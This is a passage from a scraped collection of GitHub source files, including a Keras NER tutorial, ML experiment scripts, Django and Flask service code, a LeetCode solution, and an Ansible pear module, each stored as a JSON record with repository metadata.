tar_tokenizer.texts_to_sequences(ner_tags)\n\n# 정수 인코딩이 되었는지 확인을 위해 임의로 첫번째 샘플을 출력해보겠습니다.\nprint('첫번째 샘플의 문장 :', X_train[0])\nprint('첫번째 샘플의 레이블 :', y_train[0])\n\n# 현재 문장 데이터에 대해서는 일부 단어가 'OOV'로 대체된 상황입니다.\n# 이를 확인하기 위해 디코딩 작업을 진행해봅시다.\n# 이를 위해 정수로부터 단어로 변환하는 index_to_word를 만듭니다.\nindex_to_word = src_tokenizer.index_word\nindex_to_ner = tar_tokenizer.index_word\n\n# 정수 인코딩 된 첫번째 문장을 다시 디코딩해보겠습니다.\ndecoded = []\nfor index in X_train[0]: # 첫번째 샘플 안의 각 정수로 변환된 단어에 대해서\n decoded.append(index_to_word[index]) # 단어로 변환\n\nprint('기존 문장 : {}'.format(sentences[0]))\nprint('빈도수가 낮은 단어가 OOV 처리된 문장 : {}'.format(decoded))\n\n# 일부 단어가 'OOV'로 대체되었습니다.\n# 앞서 본 그래프에 따르면, 대부분의 샘플은 길이가 70 이내입니다.\n# X에 해당되는 데이터 X_train의 샘플들과\n# y에 해당되는 데이터 y_train 샘플들의 모든 길이를 임의로 70정도로 맞추어 보겠습니다.\n# 패딩을 진행합니다.\nmax_len = 70\nX_train = pad_sequences(X_train, padding='post', maxlen=max_len)\ny_train = pad_sequences(y_train, padding='post', maxlen=max_len)\n\n# 훈련 데이터와 테스트 데이터를 8:2의 비율로 분리합니다.\nX_train, X_test, y_train, y_test = train_test_split(X_train, y_train, test_size=.2, random_state=777)\n\n# 레이블에 해당하는 태깅 정보에 대해서 원-핫 인코딩을 수행합니다.\ny_train = to_categorical(y_train, num_classes=tag_size)\ny_test = to_categorical(y_test, num_classes=tag_size)\n\n# 각 데이터에 대한 크기(shape)를 확인해보겠습니다.\nprint('훈련 샘플 문장의 크기 : {}'.format(X_train.shape))\nprint('훈련 샘플 레이블의 크기 : {}'.format(y_train.shape))\nprint('테스트 샘플 문장의 크기 : {}'.format(X_test.shape))\nprint('테스트 샘플 레이블의 크기 : {}'.format(y_test.shape))\n\n# 모델 구축\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Embedding, LSTM, Bidirectional, TimeDistributed\nfrom tensorflow.keras.optimizers import Adam\n\nembedding_dim = 128\nhidden_units = 128\n\nmodel = Sequential()\nmodel.add(Embedding(input_dim=vocab_size, output_dim=embedding_dim, input_length=max_len, mask_zero=True))\nmodel.add(Bidirectional(LSTM(hidden_units, return_sequences=True)))\nmodel.add(TimeDistributed(Dense(tag_size, activation='softmax')))\n\nmodel.compile(loss='categorical_crossentropy', optimizer=Adam(0.001), metrics=['accuracy'])\nmodel.fit(X_train, y_train, batch_size=128, epochs=8, validation_data=(X_test, y_test))\n\n# 학습이 종료되었다면 테스트 데이터에 대한 정확도를 측정합니다.\nprint(\"\\n 테스트 정확도: %.4f\" % (model.evaluate(X_test, y_test)[1]))\n\n# 실제로 맞추고 있는지를 임의의 테스트 샘플로부터(인덱스 10번) ��접 실제값과 비교해보겠습니다.\n# index_to_word와 index_to_ner를 사용하여 테스트 데이터에 대한 예측값과 실제값을 비교 출력합니다.\n\ni = 10 # 확인하고 싶은 테스트용 샘플의 인덱스.\n\n# 입력한 테스트용 샘플에 대해서 예측 y를 리턴\ny_predicted = model.predict(np.array([X_test[i]]))\n\n# 확률 벡터를 정수 레이블로 변경.\ny_predicted = np.argmax(y_predicted, axis=-1)\n\n# 원-핫 벡터를 정수 인코딩으로 변경.\nlabels = np.argmax(y_test[i], -1)\n\nprint(\"{:15}|{:5}|{}\".format(\"단어\", \"실제값\", \"예측값\"))\nprint(35 * \"-\")\n\nfor word, tag, pred in zip(X_test[i], labels, y_predicted[0]):\n if word != 0: # PAD값은 제외함.\n print(\"{:17}: {:7} {}\".format(index_to_word[word], index_to_ner[tag].upper(), index_to_ner[pred].upper()))","repo_name":"jiyongKim615/tagging_task","sub_path":"nltk_ner_example.py","file_name":"nltk_ner_example.py","file_ext":"py","file_size_in_byte":8151,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"24376455602","text":"from sklearn.ensemble import RandomForestClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.preprocessing import OneHotEncoder\nfrom sklearn.model_selection import train_test_split\nfrom commons import prepareTrainData\nfrom commons import evaluateClassifier\nfrom commons import printSubmission\n\n\nname = \"RFLR\"\n\n\nclass RFLREstimator:\n\n def get_params(self, deep=False):\n return {}\n\n def fit(self, X, y):\n X_train, X_train_lr, y_train, y_train_lr = train_test_split(\n X,\n y,\n test_size=0.5,\n )\n self.rf = RandomForestClassifier(\n n_estimators=160,\n max_depth=10,\n )\n self.lr = LogisticRegression()\n self.rf.fit(X_train, y_train)\n self.enc = OneHotEncoder()\n self.enc.fit(self.rf.apply(X_train))\n self.lr.fit(self.enc.transform(self.rf.apply(X_train_lr)), y_train_lr)\n\n def predict_proba(self, X):\n return self.lr.predict_proba(self.enc.transform(self.rf.apply(X)))\n\n\nif __name__ == \"__main__\":\n rflr = RFLREstimator()\n featureList = [\n 'bids_cnt', 'price_std', 'device_cnt', 'response_min',\n 'mean_bids_per_auction', 'price_max', 'response_median', 'country_cnt', \n 'price_mean', 'response_mean'\n ]\n X_train, y_train = prepareTrainData(featureList)\n evaluateClassifier(rflr, X_train, y_train, name)\n printSubmission(rflr, X_train, y_train, name, featureList)\n","repo_name":"laoreja/CS229-project-Robot-or-human","sub_path":"predictors/RFLR.py","file_name":"RFLR.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"37600046371","text":"from pyeasyga import pyeasyga as galg\r\nimport random\r\nimport itertools\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\nglobal pmVec\r\nglobal numClusters\r\nnumClusters=3\r\ndataSize=100\r\ndata=[]\r\nroof=1000\r\nfor a in range(dataSize):\r\n data.append((\"\",random.randint(0,roof),random.randint(0,roof)))\r\n\r\npopSize=20\r\nnumGenerations=500\r\ncrossoverProb=0.4\r\nmutationProb=0.8\r\n\r\nga = galg.GeneticAlgorithm(data,popSize,numGenerations,crossoverProb,mutationProb,True,True)\r\n\r\ndef create_individual(data):\r\n return [random.randint(0,numClusters-1) for _ in range(len(data))]\r\n\r\ndef mutate(individual):\r\n mutate_index = random.randrange(len(individual))\r\n individual[mutate_index]=random.randint(0,numClusters-1)\r\nga.mutate_function = mutate\r\nga.create_individual = create_individual\r\ndef fitness(individual, data):\r\n fn = 0\r\n for i in range(numClusters):\r\n #Pra cada cluster cria uma lista de elementos pertencentes apenas a ela\r\n lsElements=[]\r\n clusterEmpty=True\r\n for (selected, (_, x,y)) in zip(individual, data):\r\n if(selected == i): \r\n lsElements.append((x,y))\r\n clusterEmpty=False #Checa se existe alguma cluster vazia\r\n if(clusterEmpty):\r\n return 0 #Caso a cluster analisada esteja vazia retorna fitness 0\r\n \r\n if(len(lsElements)==0): break\r\n smCluster=0\r\n pmX=0\r\n pmY=0\r\n clusterSize=len(lsElements)\r\n #Define o ponto médio entre os elementos da cluster\r\n for (x,y) in lsElements:\r\n pmX+=x\r\n pmY+=y\r\n pmX/=clusterSize\r\n pmY/=clusterSize\r\n #Calcula a soma das distâncias dos pontos da cluster até o centro dela\r\n for (x,y) in lsElements:\r\n smCluster+=pow(pow(x-pmX,2)+pow(y-pmY,2),0.5)\r\n #Calcula a média das distâncias (evita que clusters que tenham muitos elementos acabem com uma fitness reduzida indevidamente)\r\n smCluster*=clusterSize\r\n fn+=smCluster\r\n fn=numClusters/fn\r\n\r\n return fn\r\n \r\nga.fitness_function = fitness\r\n\r\nga.run()\r\n\r\n#for individual in ga.last_generation():\r\n #print (individual)\r\n\r\nprint (ga.best_individual())\r\nbestind=ga.best_individual()\r\ncromossome=bestind[1]\r\n\r\ncolorset=[\"#f00\",\"#0f0\",\"#00f\",\"#0cf\",\"#ff0\",\"#2b2\",\"#0aa\",\"#aac\"]\r\nfig, ax = plt.subplots()\r\npmx = 0 \r\npmy = 0\r\nfor clusterInd in range(numClusters):\r\n i=0\r\n for pt in data:\r\n if(clusterInd==cromossome[i]):\r\n ax.plot(pt[1],pt[2],\".\",c=colorset[clusterInd])\r\n ax.text(pt[1]-0.15,pt[2]+0.4,data[i][0])\r\n i+=1\r\n\r\n\r\nplt.show()\r\n","repo_name":"cbrlpdr/ga","sub_path":"test_cluster.py","file_name":"test_cluster.py","file_ext":"py","file_size_in_byte":2628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"22932221501","text":"from django.http import HttpResponse\nfrom tablib import Dataset\n\nfrom .resources import ProductResource\n\n\n# import tablib\n# from import_export import resources\n# from product.models import Product\n\n\n\ndef export_data(request, post_data):\n product_resource = ProductResource()\n dataset = product_resource.export()\n \n if post_data.get('select') == 'json':\n response = HttpResponse(dataset.json, headers={\n 'Content-Type': 'application/json',\n 'Content-Disposition': 'attachment; filename=\"product.json\"',\n })\n msg = f'Export to {post_data.get(\"select\")} successfuly'\n return (response, msg)\n\n if post_data.get('select') == 'excel':\n response = HttpResponse(dataset.xls, headers={\n 'Content-Type': 'application/vnd.ms-excel',\n 'Content-Disposition': 'attachment; filename=\"product.xls\"',\n })\n msg = f'Export to {post_data.get(\"select\")} successfuly'\n return (response, msg)\n\n if post_data.get('select') == 'csv':\n response = HttpResponse(dataset.csv, headers={\n 'Content-Type': 'text/csv',\n 'Content-Disposition': 'attachment; filename=\"product.csv\"',\n })\n msg = f'Export to {post_data.get(\"select\")} successfuly'\n return (response, msg)\n\n\n\n\n# def import_data(request):\n# print('hello')\n# product_resource = ProductResource()\n# dataset = Dataset()\n# new_products = request.FILES['data_file']\n# product = new_products.read()\n# imported_data = dataset.load(product)\n\n# list_data = list(imported_data)\n# key = ['id','create', 'by_user','name','url_name','price','discount_price','short_description','long_description','quantity_in_stock','available','product_type','product_image','is_deleted']\n\n# for k, product in enumerate(list_data):\n# l = list()\n# for i, item in zip(key, product ):\n# data = dict([(i, item)])\n# l.append(data)","repo_name":"patrice012/ecommerce","sub_path":"dashboard/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":1992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"19481763948","text":"# Calculate factorial of any number\n\nnumber = int(input(\"Enter any number to calculate factorial:- \"))\nfact = 1\nif number > 0:\n if number == 1:\n print(fact)\n for i in range(number, 1, -1):\n fact = i * fact\n print(\"Factorial Of\", number, 'is: ', fact)\n\nelse:\n print(\"You entered wrong number:\")\n","repo_name":"vishvajitrao/Python_Programs","sub_path":"FactorialofNumber.py","file_name":"FactorialofNumber.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"9566894696","text":"from django.urls import path\nfrom rest_framework_simplejwt import views as jwt_views\n\nfrom . import views\n\nurlpatterns = [\n path(\"token/\", jwt_views.TokenObtainPairView.as_view(), name=\"token_obtain_pair\"),\n path(\"token/refresh/\", jwt_views.TokenRefreshView.as_view(), name=\"token_refresh\"),\n path(\"create_account/\", views.AccountCreateView.as_view(), name=\"account_create\"),\n path(\"balance/\", views.AccountBalanceView.as_view(), name=\"balance\"),\n path(\"deposit//\", views.DepositView.as_view(), name=\"deposit\"),\n path(\"withdrawal/\", views.WithdrawalView.as_view(), name=\"withdrawal\"),\n]\n","repo_name":"rodrigoazs/django-rest-test","sub_path":"api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"71133539663","text":"#\n# @lc app=leetcode.cn id=1021 lang=python\n#\n# [1021] 删除最外层的括号\n#\n\n# @lc code=start\nclass Solution(object):\n def removeOuterParentheses(self, s):\n \"\"\"\n :type s: str\n :rtype: str\n \"\"\"\n '''\n 思路二:参考最佳题解,\n 初始化,跳过最外面的��括号,左括号计数初始为1,右为0\n 枚举字符串中的字符对左右括号进行计数;\n 如果左右计数不相等,把当前字符放入结果字符串ans;\n 否则,不放入结果字符串,重新执行“初始化”过程,继续枚举字符;\n 枚举结束,返回ans。\n '''\n L = 1\n R = 0\n ans = \"\"\n i = 1\n while i < len(s):\n if s[i] == \"(\": L += 1\n else: R += 1\n if (R != L): ans += s[i]\n else:\n i += 1\n L = 1\n R = 0\n i += 1\n return ans\n\n# @lc code=end\n\n","repo_name":"chunxianwang/datastruct_algorithm","sub_path":"Week_02-哈希表-集合-树-图/1021.删除最外层的括号.py","file_name":"1021.删除最外层的括号.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"24841597097","text":"\r\nimport numpy as np\r\nimport matplotlib\r\nfrom src.data_management import DataHandler, Settings\r\nfrom src.methods import FixedBias, UnconditionalMetaLearning, ConditionalMetaLearning\r\nfrom src.plotting import plot_stuff\r\nimport time\r\nimport datetime\r\n\r\n\r\ndef main():\r\n\r\n # Custom's selection\r\n exp = 'exp_synthetic_1_cluster' # Figure 1 top-left\r\n # exp = 'exp_synthetic_2_clusters_mean_4' # Figure 1 top-right\r\n # exp = 'exp_synthetic_2_clusters_mean_0' # Figure 1 bottom-left\r\n # exp = 'exp_synthetic_circle' # Figure 1 bottom-right\r\n # exp = 'exp_real_lenk' # Figure 2 left\r\n # exp = 'exp_real_schools' # Figure 2 right\r\n\r\n if exp == 'exp_synthetic_1_cluster':\r\n methods = ['ITL', 'oracle_unconditional', 'unconditional', 'conditional']\r\n loss_name = 'absolute'\r\n elif exp == 'exp_synthetic_2_clusters_mean_4':\r\n methods = ['ITL', 'oracle_unconditional', 'unconditional', 'conditional']\r\n loss_name = 'absolute'\r\n elif exp == 'exp_synthetic_2_clusters_mean_0':\r\n methods = ['ITL', 'oracle_unconditional', 'unconditional', 'conditional']\r\n loss_name = 'absolute'\r\n elif exp == 'exp_synthetic_circle':\r\n methods = ['ITL', 'oracle_unconditional', 'unconditional', 'conditional_sin_cos', 'conditional_fourier']\r\n loss_name = 'absolute'\r\n elif exp == 'exp_real_lenk':\r\n methods = ['ITL', 'unconditional', 'conditional']\r\n loss_name = 'absolute'\r\n elif exp == 'exp_real_schools':\r\n methods = ['ITL', 'unconditional', 'conditional']\r\n loss_name = 'absolute'\r\n\r\n font = {'size': 26}\r\n matplotlib.rc('font', **font)\r\n results = {}\r\n\r\n lambda_par_range = [10 ** i for i in np.linspace(-5, 5, 14)] # inner regularization parameter lambda\r\n gamma_par_range = [10 ** i for i in np.linspace(-5, 5, 14)] # meta-step size gamma\r\n\r\n for curr_method in methods:\r\n\r\n results[curr_method] = []\r\n\r\n tt = time.time()\r\n\r\n trials = 10\r\n\r\n for seed in range(trials):\r\n\r\n print(f'SEED : ', seed, ' ---------------------------------------')\r\n np.random.seed(seed)\r\n general_settings = {'seed': seed,\r\n 'verbose': 1}\r\n\r\n if exp == 'exp_synthetic_1_cluster':\r\n\r\n # synthetic data 1 cluster\r\n data_settings = {'dataset': 'synthetic-regression',\r\n 'n_tr_tasks': 300,\r\n 'n_val_tasks': 100,\r\n 'n_test_tasks': 80,\r\n 'n_all_points': 20,\r\n 'ts_points_pct': 0.5,\r\n 'n_dims': 20,\r\n 'noise_std': 0.2}\r\n\r\n settings = Settings(data_settings, 'data')\r\n settings.add_settings(general_settings)\r\n data = DataHandler(settings)\r\n # quantities for generating the feature map\r\n feature_map_name = 'linear'\r\n r = None\r\n W = None\r\n\r\n elif exp == 'exp_synthetic_2_clusters_mean_4':\r\n\r\n # synthetic data MULTI clusters w_\\rho = 4\r\n data_settings = {'dataset': 'synthetic-regression-multi-clusters',\r\n 'n_tr_tasks': 300,\r\n 'n_val_tasks': 100,\r\n 'n_test_tasks': 80,\r\n 'n_all_points': 20,\r\n 'ts_points_pct': 0.5,\r\n 'n_dims': 20,\r\n 'noise_std': 0.2}\r\n\r\n settings = Settings(data_settings, 'data')\r\n settings.add_settings(general_settings)\r\n data = DataHandler(settings)\r\n # quantities for generating the feature map\r\n feature_map_name = 'linear'\r\n r = None\r\n W = None\r\n\r\n elif exp == 'exp_synthetic_2_clusters_mean_0':\r\n\r\n # synthetic data MULTI clusters w_\\rho = 0\r\n data_settings = {'dataset': 'synthetic-regression-multi-clusters-BIS',\r\n 'n_tr_tasks': 300,\r\n 'n_val_tasks': 100,\r\n 'n_test_tasks': 80,\r\n 'n_all_points': 20,\r\n 'ts_points_pct': 0.5,\r\n 'n_dims': 20,\r\n 'noise_std': 0.2}\r\n\r\n settings = Settings(data_settings, 'data')\r\n settings.add_settings(general_settings)\r\n data = DataHandler(settings)\r\n # quantities for generating the feature map\r\n feature_map_name = 'linear'\r\n r = None\r\n W = None\r\n\r\n elif exp == 'exp_synthetic_circle':\r\n\r\n # synthetic data - circle\r\n data_settings = {'dataset': 'circle',\r\n 'n_tr_tasks': 300,\r\n 'n_val_tasks': 100,\r\n 'n_test_tasks': 80,\r\n 'n_all_points': 20,\r\n 'ts_points_pct': 0.5,\r\n 'n_dims': 20,\r\n 'noise_std': 0.2,\r\n 'radius_w': 8,\r\n 'sigma_w': 1}\r\n\r\n settings = Settings(data_settings, 'data')\r\n settings.add_settings(general_settings)\r\n data = DataHandler(settings)\r\n\r\n elif exp == 'exp_real_lenk':\r\n\r\n # Lenk dataset\r\n data_settings = {'dataset': 'lenk',\r\n 'n_tr_tasks': 100,\r\n 'n_val_tasks': 40,\r\n 'n_test_tasks': 30,\r\n }\r\n\r\n settings = Settings(data_settings, 'data')\r\n settings.add_settings(general_settings)\r\n data = DataHandler(settings)\r\n # quantities for generating the feature map\r\n feature_map_name = 'linear_with_labels'\r\n r = None\r\n W = None\r\n\r\n elif exp == 'exp_real_schools':\r\n\r\n # Schools dataset\r\n data_settings = {'dataset': 'schools',\r\n 'n_tr_tasks': 70,\r\n 'n_val_tasks': 39,\r\n 'n_test_tasks': 30,\r\n 'ts_points_pct': 0.25\r\n }\r\n\r\n settings = Settings(data_settings, 'data')\r\n settings.add_settings(general_settings)\r\n data = DataHandler(settings)\r\n # quantities for generating the feature map\r\n feature_map_name = 'fourier_vector'\r\n k = 1000\r\n sigma = 100\r\n d_size = data.features_tr[0].shape[1]\r\n r = np.random.uniform(low=0., high=2 * np.pi, size=(k, 1))\r\n W = np.random.randn(k, d_size) * sigma\r\n\r\n print(f'METHOD: ', settings.data.dataset)\r\n\r\n for curr_method in methods:\r\n\r\n # print(f'method: ', curr_method)\r\n\r\n if curr_method == 'ITL':\r\n model = FixedBias(np.zeros(data.features_tr[0].shape[1]), lambda_par_range, loss_name)\r\n elif curr_method == 'oracle_unconditional':\r\n model = FixedBias(data.oracle_unconditional, lambda_par_range, loss_name)\r\n elif curr_method == 'unconditional':\r\n model = UnconditionalMetaLearning(lambda_par_range, gamma_par_range, loss_name)\r\n elif curr_method == 'conditional':\r\n model = ConditionalMetaLearning(lambda_par_range, gamma_par_range, loss_name, feature_map_name, r, W,\r\n settings.data.dataset)\r\n elif curr_method == 'conditional_sin_cos':\r\n feature_map_name = 'circle_feature_map'\r\n r = None\r\n W = None\r\n model = ConditionalMetaLearning(lambda_par_range, gamma_par_range, loss_name, feature_map_name, r, W,\r\n settings.data.dataset)\r\n elif curr_method == 'conditional_fourier':\r\n feature_map_name = 'circle_fourier'\r\n import math\r\n s_dim = 50\r\n sigma = 2 * math.pi * 10\r\n r = 2 * math.pi * np.random.uniform(0.0, 1.0, s_dim)\r\n W = sigma * np.random.randn(s_dim)\r\n model = ConditionalMetaLearning(lambda_par_range, gamma_par_range, loss_name, feature_map_name, r, W,\r\n settings.data.dataset)\r\n\r\n errors = model.fit(data)\r\n\r\n results[curr_method].append(errors)\r\n\r\n print('%s done %5.2f' % (curr_method, time.time() - tt))\r\n\r\n print('seed: %d | %5.2f sec' % (seed, time.time() - tt))\r\n\r\n np.save(settings.data.dataset + '_' + 'temp_test_error' + '_' + str(datetime.datetime.now()).replace(':', '') +\r\n '.npy', results)\r\n plot_stuff(results, methods, settings.data.dataset)\r\n\r\n exit()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n main()\r\n","repo_name":"dGiulia/ConditionalMetaLearning","sub_path":"main_script.py","file_name":"main_script.py","file_ext":"py","file_size_in_byte":9033,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"8932945023","text":"import pika\nfrom pika import channel\nimport redis\nfrom flask import Flask, request, redirect, url_for, flash, jsonify\nimport numpy as np\nimport pickle as p\nimport json\nimport asyncio\nimport uuid\nimport time\nfrom flask_cors import CORS\n\n\nred = redis.Redis(\n host= 'localhost',\n port= '6379',\n db=0)\n\napp = Flask(__name__)\nCORS(app)\n\n@app.route('/api/', methods=['POST'])\ndef receive_data():\n if request.method == \"POST\":\n\n data = request.files['file']\n print (f\"Recieve filename: {data.filename}\")\n id = str(uuid.uuid1())\n body = {'id':id,\n 'signal':data.read().decode('latin-1')}\n\n # push data to queue rabbitmq\n connection = pika.BlockingConnection(pika.ConnectionParameters('localhost'))\n channel = connection.channel()\n channel.queue_declare(queue='hello')\n channel.basic_publish(exchange='',\n routing_key='hello',\n body=json.dumps(body)\n )\n # set id for request\n red.set(id,json.dumps({'status':'pending'}))\n \n # await until worker done\n while json.loads(red.get(id))['status'] == \"pending\":\n time.sleep(0.1)\n pass\n \n # get result from redis\n result = json.loads(red.get(id))['result']\n\n connection.close()\n return jsonify({'result':result})\n\nif __name__ == '__main__':\n app.run(debug=True, host='localhost', port=1234, threaded=True)","repo_name":"vanhocvp/demo_voice_service","sub_path":"service/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"25110519007","text":"#!/usr/bin/python -tt\n# -*- coding: utf-8 -*-\n\n# (c) 2012, Afterburn \n# (c) 2013, Aaron Bull Schaefer \n# (c) 2015, Jonathan Lestrelin \n#\n# This file is part of Ansible\n#\n# Ansible is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# Ansible is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with Ansible. If not, see .\n\nANSIBLE_METADATA = {'status': ['preview'],\n 'supported_by': 'community',\n 'version': '1.0'}\n\nDOCUMENTATION = '''\n---\nmodule: pear\nshort_description: Manage pear/pecl packages\ndescription:\n - Manage PHP packages with the pear package manager.\nversion_added: 2.0\nauthor:\n - \"'jonathan.lestrelin' \"\noptions:\n name:\n description:\n - Name of the package to install, upgrade, or remove.\n required: true\n\n state:\n description:\n - Desired state of the package.\n required: false\n default: \"present\"\n choices: [\"present\", \"absent\", \"latest\"]\n'''\n\nEXAMPLES = '''\n# Install pear package\n- pear:\n name: Net_URL2\n state: present\n\n# Install pecl package\n- pear:\n name: pecl/json_post\n state: present\n\n# Upgrade package\n- pear:\n name: Net_URL2\n state: latest\n\n# Remove packages\n- pear:\n name: Net_URL2,pecl/json_post\n state: absent\n'''\n\nimport os\n\ndef get_local_version(pear_output):\n \"\"\"Take pear remoteinfo output and get the installed version\"\"\"\n lines = pear_output.split('\\n')\n for line in lines:\n if 'Installed ' in line:\n installed = line.rsplit(None, 1)[-1].strip()\n if installed == '-': continue\n return installed\n return None\n\ndef get_repository_version(pear_output):\n \"\"\"Take pear remote-info output and get the latest version\"\"\"\n lines = pear_output.split('\\n')\n for line in lines:\n if 'Latest ' in line:\n return line.rsplit(None, 1)[-1].strip()\n return None\n\ndef query_package(module, name, state=\"present\"):\n \"\"\"Query the package status in both the local system and the repository.\n Returns a boolean to indicate if the package is installed,\n and a second boolean to indicate if the package is up-to-date.\"\"\"\n if state == \"present\":\n lcmd = \"pear info %s\" % (name)\n lrc, lstdout, lstderr = module.run_command(lcmd, check_rc=False)\n if lrc != 0:\n # package is not installed locally\n return False, False\n\n rcmd = \"pear remote-info %s\" % (name)\n rrc, rstdout, rstderr = module.run_command(rcmd, check_rc=False)\n\n # get the version installed locally (if any)\n lversion = get_local_version(rstdout)\n\n # get the version in the repository\n rversion = get_repository_version(rstdout)\n\n if rrc == 0:\n # Return True to indicate that the package is installed locally,\n # and the result of the version number comparison\n # to determine if the package is up-to-date.\n return True, (lversion == rversion)\n\n return False, False\n\n\ndef remove_packages(module, packages):\n remove_c = 0\n # Using a for loop incase of error, we can report the package that failed\n for package in packages:\n # Query the package first, to see if we even need to remove\n installed, updated = query_package(module, package)\n if not installed:\n continue\n\n cmd = \"pear uninstall %s\" % (package)\n rc, stdout, stderr = module.run_command(cmd, check_rc=False)\n\n if rc != 0:\n module.fail_json(msg=\"failed to remove %s\" % (package))\n\n remove_c += 1\n\n if remove_c > 0:\n\n module.exit_json(changed=True, msg=\"removed %s package(s)\" % remove_c)\n\n module.exit_json(changed=False, msg=\"package(s) already absent\")\n\n\ndef install_packages(module, state, packages):\n install_c = 0\n\n for i, package in enumerate(packages):\n # if the package is installed and state == present\n # or state == latest and is up-to-date then skip\n installed, updated = query_package(module, package)\n if installed and (state == 'present' or (state == 'latest' and updated)):\n continue\n\n if state == 'present':\n command = 'install'\n\n if state == 'latest':\n command = 'upgrade'\n\n cmd = \"pear %s %s\" % (command, package)\n rc, stdout, stderr = module.run_command(cmd, check_rc=False)\n\n if rc != 0:\n module.fail_json(msg=\"failed to install %s\" % (package))\n\n install_c += 1\n\n if install_c > 0:\n module.exit_json(changed=True, msg=\"installed %s package(s)\" % (install_c))\n\n module.exit_json(changed=False, msg=\"package(s) already installed\")\n\n\ndef check_packages(module, packages, state):\n would_be_changed = []\n for package in packages:\n installed, updated = query_package(module, package)\n if ((state in [\"present\", \"latest\"] and not installed) or\n (state == \"absent\" and installed) or\n (state == \"latest\" and not updated)):\n would_be_changed.append(package)\n if would_be_changed:\n if state == \"absent\":\n state = \"removed\"\n module.exit_json(changed=True, msg=\"%s package(s) would be %s\" % (\n len(would_be_changed), state))\n else:\n module.exit_json(change=False, msg=\"package(s) already %s\" % state)\n\n\ndef exe_exists(program):\n for path in os.environ[\"PATH\"].split(os.pathsep):\n path = path.strip('\"')\n exe_file = os.path.join(path, program)\n if os.path.isfile(exe_file) and os.access(exe_file, os.X_OK):\n return True\n\n return False\n\n\ndef main():\n module = AnsibleModule(\n argument_spec = dict(\n name = dict(aliases=['pkg']),\n state = dict(default='present', choices=['present', 'installed', \"latest\", 'absent', 'removed'])),\n required_one_of = [['name']],\n supports_check_mode = True)\n\n if not exe_exists(\"pear\"):\n module.fail_json(msg=\"cannot find pear executable in PATH\")\n\n p = module.params\n\n # normalize the state parameter\n if p['state'] in ['present', 'installed']:\n p['state'] = 'present'\n elif p['state'] in ['absent', 'removed']:\n p['state'] = 'absent'\n\n if p['name']:\n pkgs = p['name'].split(',')\n\n pkg_files = []\n for i, pkg in enumerate(pkgs):\n pkg_files.append(None)\n\n if module.check_mode:\n check_packages(module, pkgs, p['state'])\n\n if p['state'] in ['present', 'latest']:\n install_packages(module, p['state'], pkgs)\n elif p['state'] == 'absent':\n remove_packages(module, pkgs)\n\n# import module snippets\nfrom ansible.module_utils.basic import *\n\nif __name__ == '__main__':\n main()\n","repo_name":"ansible/ansible-modules-extras","sub_path":"packaging/language/pear.py","file_name":"pear.py","file_ext":"py","file_size_in_byte":7353,"program_lang":"python","lang":"en","doc_type":"code","stars":944,"dataset":"github-code","pt":"47"} +{"seq_id":"28799827189","text":"#!/usr/bin/env python\n\nimport argparse\nimport os\nimport sys\nimport json\n\n# Add iSDX folder to Python's system path\nisdx_folder = \"iSDX\"\nhome = os.path.expanduser(\"~/\")\nisdx_path = home + isdx_folder\n# isdx = os.path.dirname(\"/home/vagrant/iSDX/\")\nif isdx_path not in sys.path:\n sys.path.append(isdx_path)\n\nimport util.log\nfrom access_control import AccessControl\n# Just in case of need in the future\nfrom xctrl.client import RefMonClient # Socket\nfrom lib import Config\nfrom time import sleep\n\n\ndef main():\n # sleep(5) #added a sleep to avoid \"Connection refused\" or \"404\" errors\n parser = argparse.ArgumentParser()\n parser.add_argument('dir', help='the directory of the example')\n args = parser.parse_args()\n\n # locate config file\n base_path = os.path.abspath(os.path.join(os.path.dirname(os.path.realpath(__file__)),\"..\",\"examples\",args.dir,\"config\"))\n config_file = os.path.join(base_path, \"sdx_global.cfg\")\n # locate the monitor's flows configuration file\n access_control_flows_file = os.path.join(base_path, \"access_control_flows.cfg\")\n config = Config(config_file)\n \n if os.path.exists(access_control_flows_file):\n with file(access_control_flows_file) as f:\n flows = json.load(f)\n else:\n flows={\"access_control_flows\" : {}}\n\n # start umbrella fabric manager\n logger = util.log.getLogger('access-control')\n logger.info('init')\n\n # Keep it for now just in case we decide to send messages to Refmon\n logger.info('REFMON client: ' + str(config.refmon[\"IP\"]) + ' ' + str(config.refmon[\"Port\"]))\n client = RefMonClient(config.refmon[\"IP\"], config.refmon[\"Port\"], config.refmon[\"key\"])\n\n controller = AccessControl(config, flows, client, logger)\n logger.info('start')\n controller.start()\n\n\nif __name__ == '__main__':\n main()","repo_name":"h2020-endeavour/endeavour","sub_path":"acctrl/acctrl.py","file_name":"acctrl.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"47"} +{"seq_id":"11289005732","text":"\"\"\" 